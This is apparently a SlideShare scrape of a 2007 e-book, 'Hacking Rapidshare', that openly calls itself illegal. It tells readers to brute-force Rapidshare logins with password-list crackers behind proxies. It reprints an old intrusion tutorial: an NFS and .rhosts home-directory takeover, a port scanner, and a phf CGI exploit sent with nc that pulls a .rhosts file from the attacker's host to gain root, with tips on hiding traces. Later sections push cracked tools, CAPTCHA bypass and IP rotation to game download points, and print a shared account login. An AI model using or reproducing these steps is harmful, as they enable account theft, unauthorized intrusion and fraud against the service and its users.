SlideShare a Scribd company logo
http://krimo666.mylivepage.com/
Hacking
                   Rapidshare

                               By:-Nilesh Ranjan




Hacking the most criminal activity on internet

Published by
Softstar-X Publishing, Inc.
www.xenium.freeforums.org
xeniumstudio@gmail.com

Copyright 2007 by Softstar-X Publishing, Inc.
Jharkhand,
India.




                              http://krimo666.mylivepage.com/
WARNING

This book is completely based on hacking. If you are using this books and you are caught by the cyber
police than we are not responsible for that. Remember this book is completely illegal.
The Author of this doesn’t take any responsibility for being caught by cyber police.




                              http://krimo666.mylivepage.com/
About the Author
Nilesh Ranjan is the world’s biggest hacker. He has the ability to hack bank accounts, credit cards and
many other login.
He is the administrator of the Forum (www.xenium.freeforums.org). His e-mail address is
xeniumstudio@gmail.com
If you want to contact the publisher than e-mail us a hackmaster792@gmail.com




                               http://krimo666.mylivepage.com/
Introduction
H   acking the most criminal activity on Internet is a book about hacking through which you can earn a
lot of money it can be 10,000,000$ also by selling RS Accounts.




                 This book will complete your dream
                        if you are intelligent.




                               http://krimo666.mylivepage.com/
Hacking Rapidshare Login
                                                         Chapter-1
                                                              er-
 For hacking site first come to the site login address than copy the address and paste the
address in an application named wwwhack which we will provide you with this book.
If you know a username than it’s very well but if you don’t know the username than at the
place of username locate the user.txt file and at the place of password locate the password.txt
file and start the process.
     If this software replies that it is not a password protected site than you will have to use the
     wedcracker application.
To begin this hack you will just have to be connected with a U.S.A proxy server.
Install the Application web cracker and start the application. in the place of username file just
type the username, in the place of password file browse and select the password list file
(password.txt) and in the place of URL type the path to insert the password now choose the
options as you wish or leave them blank in the “Advanced” tab give the U.S.A proxy server
and in the “logging” tab just select the log file to save the password and at last click at start
button. Finally you will get the password.

If the above process doesn’t work for you than follow the bellow process:-

Intro: Hacking step by step.
__________________________________________________________________________
______
_
Well, this ain't exactely for beginners, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...
Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.
Ok. In the next pages we'll see exactely what I meant.
Step 1: Getting access.
_______
Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:
mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.
If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...




                                 http://krimo666.mylivepage.com/
mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/
Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd
We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might
forget it on the remote server...
mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/
So we own this guy's home directory...
mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).




                            http://krimo666.mylivepage.com/
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
int main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;
if (argc != 2) {
printf("Usage: %s hostnamen", argv[0]);
exit(1);
}
for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof sa);
if (err < 0) {
printf("%s %-5d %sr", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted. n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("nshutdown");
exit(2);




                           http://krimo666.mylivepage.com/
}
}
close(net);
}
printf(" r");
fflush(stdout);
return (0);
}
Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :
mysite:~>echo "+ +" > /tmp/rhosts
mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80
then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#
Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...
Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at roo


Remember: you should use a U.S.A proxy server. The benefit of connecting through a proxy
server is that the site couldn’t know anything about you, he can’t trace you.




                          http://krimo666.mylivepage.com/
Download Tricks
                        o n       i k
                               Chapter-2
Here We introduces u the process of downloading files with the help of some Apps


Universal share downloader 1.3.4.8



This is universal share downloader with all the plugins for "filesharing" websites so you don't have to
wait. It comes with a lot of website plugins such as: Badango, megaupload, megarotic, rapidshare,
gigashare, and more over 50 of them. Nobody in this website posted this with the plugins ( I think),
because you have to pay for it, but I am giving it for free



http://rapidshare.com/files/73638768/USDownloader updater reconnecter.rar




Rapidshare Leecher 2007 Ultimate With Automatic Captcha



Rapidshare Ultimate 2007 is a software to download files from the world's largest file-sharing network
Rapidshare, based on the source code donated by previous RapidLeecher author this version
automatically decodes the image code allowing you to use the service without any hassle in a more
easy way, RapidLeecher 2007 can run into fully automatic mode residing into system tray using
minimal system resources monitoring user clipboard and autostart file download from rapidshare in
background as soon as a rapidshare link is copied into the clipboard. The free software has support
for pr@xy s@rvers so that you can download many files at the same time (using different pr@xy).
and multiple instance of the software.
Main Features Include -
1. Fully Automated Downloading supporting a semi-automatic option.
2. Automatic CAPTCHA Image Detection.
3. Auto start at system boot with system tray support.
4. Clipboard monitoring.
5. Silent operation mode, will sit and wait for links in system tray.
6. Pr@xy Support for simultaneous downloads and unlimited downloading.




                             http://krimo666.mylivepage.com/
7. Inbuilt Downloader with detailed static's.
8. Full installer and uninstaller.
9. Very simple to use.
10. Pleasant, easy to use interface.
11. Constantly Updated.
12. Adware & Spyware Free.
13. Support is provided for users with quick BUG FIXES
14. Best of All its SAFE.




http://rapidshare.com/files/73910533/Rapidshare Leetcher.rar




Hack Rapidshare with FireFox




Download This File And coppy This File to firefox installation folder and extract the rar file there and
drag all the files to fire fox one by one it will ask to install and then install it



http://rapidshare.com/files/74182880/Rapid Hack With Firefox.rar




                             http://krimo666.mylivepage.com/
Collect Rapidshare Premium Accounts Per Month
 o           sh     re u      o t        o
                                                                 Chapter-3
                                                                      er-
Here is a forum provides RS premium Account for free man
http://xenium.freeforums.org




100% Working Steps to get 28800 RS points each month
well firstly i think its not a new idea...but im sure no 1 tried it before...
anyway, the thing is that we make a new account on rapidshare...(collectors account) for those who
doesn't have premium account...therefore, the premium users can use their premium accounts to do
this also to get free points....
after u create new account..upload two filesb]...
each 1 of them th size must b at least 1Mb.




Download USDownloader+reconnect v1.0 from here:


http://rapidshare.com/files/73638768/USDownloader updater reconnecter.rar




now follow the Instructions:
   1- unrar USDownloader then go 2 USD directory and open reconnect v1.0.exe




                           http://krimo666.mylivepage.com/
2- choose ur connection (which type?)




                       http://krimo666.mylivepage.com/
I use thorough
   coz i'm behind 2 connections (wireless + dial-up)




now follow this pic..




                           http://krimo666.mylivepage.com/
then hit save & reconnect button and wait
until it finishes the procedure..




procedure must b ended with success..
coz if not then u need to change ur connection...
now after getting success..the program will prompt u 2 save a setting..just press No!
anyway, now go 2 USD directory and check this file if it is there or not..




                        http://krimo666.mylivepage.com/
if not then u must re-do everything from the beginning...
anyway...
Now open USDownloader...
2- go 2 options and do this
in main




                         http://krimo666.mylivepage.com/
3- now go to scheduler
press add




                         http://krimo666.mylivepage.com/
then add another task..




                          http://krimo666.mylivepage.com/
http://krimo666.mylivepage.com/
then okay...
add task #3(FIXED) somtimes RS force u 2 wait 200 or 100 minutes but now u can avoid that
by doing this




                       http://krimo666.mylivepage.com/
now just press OK and thats all...
anyway, at this moment u can paste ur 2 links inside the "usdownloader" and start to get
ur own points, but before that u must keep in mind u should copy the 2 links to clipboard
and keep it copied there..
--------- ----------



FOR Static IP users and who doesn't have (dial-up connection):-
dudes i found a tool that can change static IPs ...not only static(all kind of IPs dynamic IPs
included) all modems and routers...
okay lets begin..
firstly download SMAC address Changer 2.0:



http://rapidshare.com/files/73703564/Ip Forcer.rar




                         http://krimo666.mylivepage.com/
1- install SMAC address Changer 2.0, apply the crack...then open the program..
and follow these steps...
choose ur network adapter!




                        http://krimo666.mylivepage.com/
now check ur IP...(is it changed??) say thanx if yes




                         http://krimo666.mylivepage.com/
okay..?
2- now install macroRecorder and apply the crack as usual...
and record the above steps with it..
3- compile 2 EXE ..
4- add the complied EXE to ur schedule in USDOWNLOADER!!
5- and dang!!...u r done
*ps(important) take a note that u must use same tasks in scheduler that i wrote before..u
only change reconnect v1.0.exe with ur compiled file from macroRecorder...
______________________________________________________________________
Q: Can Rs Ban me or block my account?? while i'm doing this procedure??
A: firstly u r not doing somthing wrong or forbidden so RS can notice and delete or ban ur
account..they cannot even notify.. that u r boosting ur point, coz u r logging from 60
different IPs each hour...
Q: Can USDownloader recognize the Captcha codes and enter them automatically for
me??
A: USDownloader can recognize the captcha codes and convert them to text, then enter
the codes automatically...so no need to enter codes manually..so u can do all these step
automatically to boost ur points...
Q: HOW did u calculate the points??
A: 45 sec for waiting for the ticket +45 sec to download and reconnect = 1:30 mins (1 point)
so each 90 seconds u will earn 1 point in ur account
so 1 hour = 40 points
24 hours = 960 points
1 week = 6720 points
1 month = 28800 point




                       http://krimo666.mylivepage.com/
Visit My Rapidshare Folder (Daily Updated)
  i            i       od     D yU d
http://rapidshare.com/users/P0BV85
       /  i s re.      u     / 0
Here Rapidshare and Megaupload Premium Account is
  e R pd a ea             g po      r  i m          s
Also Given for free.
  l               re
Megaupload Premium Member Account That Supports
      a    a                  e    o t        p r
Resume Downloads
  e
Id:- cynide_2006
    - y    _2
Pass:- cynide_2006
    s c         _2 6
Cheack u will find it working Reguards Xeniumstudio
  h          i           r i   R g    sX nu      i




             http://krimo666.mylivepage.com/

More Related Content

PPTX
Summer of Fuzz: macOS
PDF
JPMorgan Chase Fourth Quarter and Full-Year 2008 Financial Results Conference...
PDF
Will apps replace the web? (or, why webhub.mobi?) - 6.8.2012
PDF
ATI's Total Systems Engineering Development & Management technical training c...
PPT
Teradata Customer Services
PPT
Legal Issues For Business Start Up
PPTX
Hacker tooltalk: Social Engineering Toolkit (SET)
PDF
From java to rails
Summer of Fuzz: macOS
JPMorgan Chase Fourth Quarter and Full-Year 2008 Financial Results Conference...
Will apps replace the web? (or, why webhub.mobi?) - 6.8.2012
ATI's Total Systems Engineering Development & Management technical training c...
Teradata Customer Services
Legal Issues For Business Start Up
Hacker tooltalk: Social Engineering Toolkit (SET)
From java to rails

Similar to Hacking Rapidshare (20)

PDF
Putting the tea back into cyber terrorism
PDF
Windows Vista Customization Manual
PDF
Do your test
PDF
Satellite With Alt Dvb
PDF
『Ficia』インフラとPerlにまつわるエトセトラ
PDF
PDF
Jtag Powersky
PDF
Consumer Password Worst Practices
KEY
クックパッドでのemr利用事例
PPTX
The purpose of operating systems
PPTX
Cyber Crime
PDF
Scalable JavaScript Application Architecture
PDF
Firefox3.5 And Next
PDF
How To Flash Your Humax V1.0b
DOCX
Using XAMPP
PDF
Why Perl, when you can use bash+awk+sed? :P
PDF
Network Forensics - Your Only Choice at 10G
PDF
Love The Terminal
PDF
Using Database Constraints Wisely
PDF
Getting started with Cloud Foundry
Putting the tea back into cyber terrorism
Windows Vista Customization Manual
Do your test
Satellite With Alt Dvb
『Ficia』インフラとPerlにまつわるエトセトラ
Jtag Powersky
Consumer Password Worst Practices
クックパッドでのemr利用事例
The purpose of operating systems
Cyber Crime
Scalable JavaScript Application Architecture
Firefox3.5 And Next
How To Flash Your Humax V1.0b
Using XAMPP
Why Perl, when you can use bash+awk+sed? :P
Network Forensics - Your Only Choice at 10G
Love The Terminal
Using Database Constraints Wisely
Getting started with Cloud Foundry

Recently uploaded (20)

PPTX
Microbial diseases, their pathogenesis and prophylaxis
PPTX
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
PDF
Origin of periodic table-Mendeleev’s Periodic-Modern Periodic table
PDF
Supply Chain Operations Speaking Notes -ICLT Program
PDF
102 student loan defaulters named and shamed – Is someone you know on the list?
PDF
Mark Klimek Lecture Notes_240423 revision books _173037.pdf
PDF
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
PDF
FourierSeries-QuestionsWithAnswers(Part-A).pdf
PPTX
Pharmacology of Heart Failure /Pharmacotherapy of CHF
PDF
Module 4: Burden of Disease Tutorial Slides S2 2025
PDF
Basic Mud Logging Guide for educational purpose
PDF
01-Introduction-to-Information-Management.pdf
PDF
STATICS OF THE RIGID BODIES Hibbelers.pdf
PDF
RMMM.pdf make it easy to upload and study
PPTX
Institutional Correction lecture only . . .
PDF
Business Ethics Teaching Materials for college
PDF
3rd Neelam Sanjeevareddy Memorial Lecture.pdf
PDF
Insiders guide to clinical Medicine.pdf
PDF
O5-L3 Freight Transport Ops (International) V1.pdf
PPTX
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx
Microbial diseases, their pathogenesis and prophylaxis
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
Origin of periodic table-Mendeleev’s Periodic-Modern Periodic table
Supply Chain Operations Speaking Notes -ICLT Program
102 student loan defaulters named and shamed – Is someone you know on the list?
Mark Klimek Lecture Notes_240423 revision books _173037.pdf
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
FourierSeries-QuestionsWithAnswers(Part-A).pdf
Pharmacology of Heart Failure /Pharmacotherapy of CHF
Module 4: Burden of Disease Tutorial Slides S2 2025
Basic Mud Logging Guide for educational purpose
01-Introduction-to-Information-Management.pdf
STATICS OF THE RIGID BODIES Hibbelers.pdf
RMMM.pdf make it easy to upload and study
Institutional Correction lecture only . . .
Business Ethics Teaching Materials for college
3rd Neelam Sanjeevareddy Memorial Lecture.pdf
Insiders guide to clinical Medicine.pdf
O5-L3 Freight Transport Ops (International) V1.pdf
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx

Hacking Rapidshare

  • 2. Hacking Rapidshare By:-Nilesh Ranjan Hacking the most criminal activity on internet Published by Softstar-X Publishing, Inc. www.xenium.freeforums.org xeniumstudio@gmail.com Copyright 2007 by Softstar-X Publishing, Inc. Jharkhand, India. http://krimo666.mylivepage.com/
  • 3. WARNING This book is completely based on hacking. If you are using this books and you are caught by the cyber police than we are not responsible for that. Remember this book is completely illegal. The Author of this doesn’t take any responsibility for being caught by cyber police. http://krimo666.mylivepage.com/
  • 4. About the Author Nilesh Ranjan is the world’s biggest hacker. He has the ability to hack bank accounts, credit cards and many other login. He is the administrator of the Forum (www.xenium.freeforums.org). His e-mail address is xeniumstudio@gmail.com If you want to contact the publisher than e-mail us a hackmaster792@gmail.com http://krimo666.mylivepage.com/
  • 5. Introduction H acking the most criminal activity on Internet is a book about hacking through which you can earn a lot of money it can be 10,000,000$ also by selling RS Accounts. This book will complete your dream if you are intelligent. http://krimo666.mylivepage.com/
  • 6. Hacking Rapidshare Login Chapter-1 er- For hacking site first come to the site login address than copy the address and paste the address in an application named wwwhack which we will provide you with this book. If you know a username than it’s very well but if you don’t know the username than at the place of username locate the user.txt file and at the place of password locate the password.txt file and start the process. If this software replies that it is not a password protected site than you will have to use the wedcracker application. To begin this hack you will just have to be connected with a U.S.A proxy server. Install the Application web cracker and start the application. in the place of username file just type the username, in the place of password file browse and select the password list file (password.txt) and in the place of URL type the path to insert the password now choose the options as you wish or leave them blank in the “Advanced” tab give the U.S.A proxy server and in the “logging” tab just select the log file to save the password and at last click at start button. Finally you will get the password. If the above process doesn’t work for you than follow the bellow process:- Intro: Hacking step by step. __________________________________________________________________________ ______ _ Well, this ain't exactely for beginners, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step 1: Getting access to site. Step 2: Hacking r00t. Step 3: Covering your traces. Step 4: Keeping that account. Ok. In the next pages we'll see exactely what I meant. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site. I'll try to explain the most used ones. The first thing I do is see if the system has an export list: mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way in. What I was trying to do was to exploit an old security problem by most SUN OS's that could allow an remote attacker to add a .rhosts to a users home directory... (That was possible if the site had mounted their home directory. Let's see what happens... http://krimo666.mylivepage.com/
  • 7. mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper's home. mysite:~>id uid=0 euid=0 mysite:~>whoami root mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might forget it on the remote server... mysite:~>su - rapper Welcome to rapper's user. mysite:~>ls -lsa /tmp/mount/ total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts mysite:~>cd / mysite:~>rlogin victim1.site.com Welcome to Victim.Site.Com. SunOs ver....(crap). victim1:~$ This is the first method... Another method could be to see if the site has an open 80 port. That would mean that the site has a web page. (And that's very bad, 'cuz it usually it's vulnerable). http://krimo666.mylivepage.com/
  • 8. Below I include the source of a scanner that helped me when NMAP wasn't written. (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor). NMAP is a scanner that does even stealth scanning, so lots of systems won't record it. /* -*-C-*- tcpprobe.c */ /* tcpprobe - report on which tcp ports accept connections */ /* IO ERROR, error@axs.net, Sep 15, 1995 */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <netdb.h> #include <signal.h> int main(int argc, char **argv) { int probeport = 0; struct hostent *host; int err, i, net; struct sockaddr_in sa; if (argc != 2) { printf("Usage: %s hostnamen", argv[0]); exit(1); } for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa); sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) { perror("nsocket"); exit(2); } err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) { printf("%s %-5d %sr", argv[1], i, strerror(errno)); fflush(stdout); } else { printf("%s %-5d accepted. n", argv[1], i); if (shutdown(net, 2) < 0) { perror("nshutdown"); exit(2); http://krimo666.mylivepage.com/
  • 9. } } close(net); } printf(" r"); fflush(stdout); return (0); } Well, now be very carefull with the below exploits, because they usually get logged. Besides, if you really wanna get a source file from /cgi-bin/ use this sintax : lynx http://www.victim1.com//cgi-bin/finger If you don't wanna do that, then do a : mysite:~>echo "+ +" > /tmp/rhosts mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80 then mysite:~>rlogin -l root victim1.site.com Welcome to Victim1.Site.Com. victim1:~# Or, maybe, just try to find out usernames and passwords... The usual users are "test", "guest", and maybe the owner of the site... I usually don't do such things, but you can... Or if the site is really old, use that (quote site exec) old bug for wu.ftpd. There are a lot of other exploits, like the remote exploits (innd, imap2, pop3, etc...) that you can find at roo Remember: you should use a U.S.A proxy server. The benefit of connecting through a proxy server is that the site couldn’t know anything about you, he can’t trace you. http://krimo666.mylivepage.com/
  • 10. Download Tricks o n i k Chapter-2 Here We introduces u the process of downloading files with the help of some Apps Universal share downloader 1.3.4.8 This is universal share downloader with all the plugins for "filesharing" websites so you don't have to wait. It comes with a lot of website plugins such as: Badango, megaupload, megarotic, rapidshare, gigashare, and more over 50 of them. Nobody in this website posted this with the plugins ( I think), because you have to pay for it, but I am giving it for free http://rapidshare.com/files/73638768/USDownloader updater reconnecter.rar Rapidshare Leecher 2007 Ultimate With Automatic Captcha Rapidshare Ultimate 2007 is a software to download files from the world's largest file-sharing network Rapidshare, based on the source code donated by previous RapidLeecher author this version automatically decodes the image code allowing you to use the service without any hassle in a more easy way, RapidLeecher 2007 can run into fully automatic mode residing into system tray using minimal system resources monitoring user clipboard and autostart file download from rapidshare in background as soon as a rapidshare link is copied into the clipboard. The free software has support for pr@xy s@rvers so that you can download many files at the same time (using different pr@xy). and multiple instance of the software. Main Features Include - 1. Fully Automated Downloading supporting a semi-automatic option. 2. Automatic CAPTCHA Image Detection. 3. Auto start at system boot with system tray support. 4. Clipboard monitoring. 5. Silent operation mode, will sit and wait for links in system tray. 6. Pr@xy Support for simultaneous downloads and unlimited downloading. http://krimo666.mylivepage.com/
  • 11. 7. Inbuilt Downloader with detailed static's. 8. Full installer and uninstaller. 9. Very simple to use. 10. Pleasant, easy to use interface. 11. Constantly Updated. 12. Adware & Spyware Free. 13. Support is provided for users with quick BUG FIXES 14. Best of All its SAFE. http://rapidshare.com/files/73910533/Rapidshare Leetcher.rar Hack Rapidshare with FireFox Download This File And coppy This File to firefox installation folder and extract the rar file there and drag all the files to fire fox one by one it will ask to install and then install it http://rapidshare.com/files/74182880/Rapid Hack With Firefox.rar http://krimo666.mylivepage.com/
  • 12. Collect Rapidshare Premium Accounts Per Month o sh re u o t o Chapter-3 er- Here is a forum provides RS premium Account for free man http://xenium.freeforums.org 100% Working Steps to get 28800 RS points each month well firstly i think its not a new idea...but im sure no 1 tried it before... anyway, the thing is that we make a new account on rapidshare...(collectors account) for those who doesn't have premium account...therefore, the premium users can use their premium accounts to do this also to get free points.... after u create new account..upload two filesb]... each 1 of them th size must b at least 1Mb. Download USDownloader+reconnect v1.0 from here: http://rapidshare.com/files/73638768/USDownloader updater reconnecter.rar now follow the Instructions: 1- unrar USDownloader then go 2 USD directory and open reconnect v1.0.exe http://krimo666.mylivepage.com/
  • 13. 2- choose ur connection (which type?) http://krimo666.mylivepage.com/
  • 14. I use thorough coz i'm behind 2 connections (wireless + dial-up) now follow this pic.. http://krimo666.mylivepage.com/
  • 15. then hit save & reconnect button and wait until it finishes the procedure.. procedure must b ended with success.. coz if not then u need to change ur connection... now after getting success..the program will prompt u 2 save a setting..just press No! anyway, now go 2 USD directory and check this file if it is there or not.. http://krimo666.mylivepage.com/
  • 16. if not then u must re-do everything from the beginning... anyway... Now open USDownloader... 2- go 2 options and do this in main http://krimo666.mylivepage.com/
  • 17. 3- now go to scheduler press add http://krimo666.mylivepage.com/
  • 18. then add another task.. http://krimo666.mylivepage.com/
  • 20. then okay... add task #3(FIXED) somtimes RS force u 2 wait 200 or 100 minutes but now u can avoid that by doing this http://krimo666.mylivepage.com/
  • 21. now just press OK and thats all... anyway, at this moment u can paste ur 2 links inside the "usdownloader" and start to get ur own points, but before that u must keep in mind u should copy the 2 links to clipboard and keep it copied there.. --------- ---------- FOR Static IP users and who doesn't have (dial-up connection):- dudes i found a tool that can change static IPs ...not only static(all kind of IPs dynamic IPs included) all modems and routers... okay lets begin.. firstly download SMAC address Changer 2.0: http://rapidshare.com/files/73703564/Ip Forcer.rar http://krimo666.mylivepage.com/
  • 22. 1- install SMAC address Changer 2.0, apply the crack...then open the program.. and follow these steps... choose ur network adapter! http://krimo666.mylivepage.com/
  • 23. now check ur IP...(is it changed??) say thanx if yes http://krimo666.mylivepage.com/
  • 24. okay..? 2- now install macroRecorder and apply the crack as usual... and record the above steps with it.. 3- compile 2 EXE .. 4- add the complied EXE to ur schedule in USDOWNLOADER!! 5- and dang!!...u r done *ps(important) take a note that u must use same tasks in scheduler that i wrote before..u only change reconnect v1.0.exe with ur compiled file from macroRecorder... ______________________________________________________________________ Q: Can Rs Ban me or block my account?? while i'm doing this procedure?? A: firstly u r not doing somthing wrong or forbidden so RS can notice and delete or ban ur account..they cannot even notify.. that u r boosting ur point, coz u r logging from 60 different IPs each hour... Q: Can USDownloader recognize the Captcha codes and enter them automatically for me?? A: USDownloader can recognize the captcha codes and convert them to text, then enter the codes automatically...so no need to enter codes manually..so u can do all these step automatically to boost ur points... Q: HOW did u calculate the points?? A: 45 sec for waiting for the ticket +45 sec to download and reconnect = 1:30 mins (1 point) so each 90 seconds u will earn 1 point in ur account so 1 hour = 40 points 24 hours = 960 points 1 week = 6720 points 1 month = 28800 point http://krimo666.mylivepage.com/
